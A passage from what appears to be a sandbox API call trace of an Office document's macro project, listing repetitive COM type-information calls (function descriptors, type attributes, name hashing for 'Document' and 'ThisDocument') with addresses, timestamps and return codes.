ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe6, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe8, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe9, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xea, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xeb, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xec, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xed, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xee, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xef, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf0, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf1, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf2, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf3, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf4, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.240] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.240] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf6, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.240] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.240] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf8, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.240] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.240] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x206348 | out: pVarVal=0x206348*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.240] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.240] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x206340, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206250, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.240] IMalloc:Realloc (This=0x7feff045380, pv=0x81883c0, cb=0x62) returned 0x8070430 [0045.241] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.241] IUnknown:AddRef (This=0x7f723a0) returned 0x3 [0045.241] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x206570, pDummy=0x0 | out: ppTypeAttr=0x206570, pDummy=0x0) returned 0x0 [0045.241] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.241] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f723a0, index=0x0, pRefType=0x206568 | out: pRefType=0x206568*=0x3) returned 0x0 [0045.241] ITypeInfo:GetRefTypeInfo (in: This=0x7f723a0, hreftype=0x3, ppTInfo=0x206578 | out: ppTInfo=0x206578*=0x8137308) returned 0x0 [0045.242] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.242] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x206570, pDummy=0x206548 | out: ppTypeAttr=0x206570, pDummy=0x206548*=0x3) returned 0x0 [0045.242] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.242] ITypeInfo:GetRefTypeOfImplType (in: This=0x8137308, index=0x0, pRefType=0x206568 | out: pRefType=0x206568*=0x182) returned 0x0 [0045.242] ITypeInfo:GetRefTypeInfo (in: This=0x8137308, hreftype=0x182, ppTInfo=0x206578 | out: ppTInfo=0x206578*=0x8137360) returned 0x0 [0045.242] IUnknown:Release (This=0x8137308) returned 0x1 [0045.242] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137360, ppTypeAttr=0x206570, pDummy=0x206550 | out: ppTypeAttr=0x206570, pDummy=0x206550*=0x206580) returned 0x0 [0045.242] ITypeInfo:LocalReleaseTypeAttr (This=0x8137360) returned 0x0 [0045.242] IUnknown:Release (This=0x8137360) returned 0x1 [0045.242] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="045e399ea6", cchWideChar=11, lpMultiByteStr=0x206560, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="045e399ea6", lpUsedDefaultChar=0x0) returned 11 [0045.242] GetLocalTime (in: lpSystemTime=0x206648 | out: lpSystemTime=0x206648*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xb, wMilliseconds=0x11)) [0045.242] _ultow_s (in: _Value=0x5e399ea7, _Buffer=0x81f4f34, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea7") returned 0x0 [0045.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055e399ea7", cchWideChar=11, lpMultiByteStr=0x2065a0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055e399ea7", lpUsedDefaultChar=0x0) returned 11 [0045.242] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2065f8, pDummy=0x81f5c40 | out: ppTypeAttr=0x2065f8, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.242] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2065a0, pDummy=0x81f5c40 | out: ppTypeAttr=0x2065a0, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.242] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.242] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.242] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.242] IMalloc:Realloc (This=0x7feff045380, pv=0x811c560, cb=0x100) returned 0x810a3c0 [0045.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2063e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.243] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.243] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.243] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2061a0 | out: ppvObject=0x2061a0*=0x0) returned 0x80004002 [0045.243] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2060e8 | out: ppvObject=0x2060e8*=0x7f722f0) returned 0x0 [0045.243] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x2060f8 | out: pVarVal=0x2060f8*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.243] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.243] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x2060f0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206110 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x206110*="") returned 0x0 [0045.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206000, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.243] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2060f0, pDummy=0x0 | out: ppTypeAttr=0x2060f0, pDummy=0x0) returned 0x0 [0045.243] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.243] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.243] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.243] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.243] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.243] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.243] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x10, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x11, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x12, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x13, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x14, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x15, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x16, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x17, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.244] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x18, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.244] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x19, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x20, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x21, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x22, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x23, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x24, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x25, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x26, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x27, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x28, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x29, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.245] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.245] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x30, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x31, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x32, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x33, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x34, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc 